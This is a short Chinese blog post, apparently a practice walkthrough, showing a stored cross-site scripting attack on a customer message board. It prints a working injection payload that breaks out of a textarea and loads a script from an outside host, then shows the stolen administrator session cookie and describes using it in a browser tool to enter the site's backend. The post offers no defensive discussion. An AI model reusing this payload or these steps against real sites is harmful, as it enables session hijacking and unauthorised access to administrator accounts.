Xss跨站脚本 - To be the young king

首先登录xssaq
2024-06-04T05:56:54.png

之后创建新项目
2024-06-04T05:58:27.png
2024-06-04T05:58:43.png
2024-06-04T05:59:01.png

创建成功后，提取

</tEXtArEa>'"><sCRiPt sRC=//uj.ci/i1w></sCrIpT>

之后打开网址“客户留言板块”
2024-06-04T06:00:25.png
注意两个放入代码的位置

提交信息
2024-06-04T06:01:05.png

之后我们模拟管理员查看留言
2024-06-04T06:01:59.png

返回，查看xssaq平台
2024-06-04T06:06:27.png

得到cookie

ASPSESSIONIDAADCCQSB=GFKPIJNCDOFGBIBPGFFCJINO

之后打开鬼哥浏览器，如图操作
2024-06-04T06:07:42.png

成功进入后台

本文由 root 创作，采用知识共享署名4.0 国际许可协议进行许可。
本站文章除注明转载/出处外，均为本站原创或翻译，转载前请务必署名。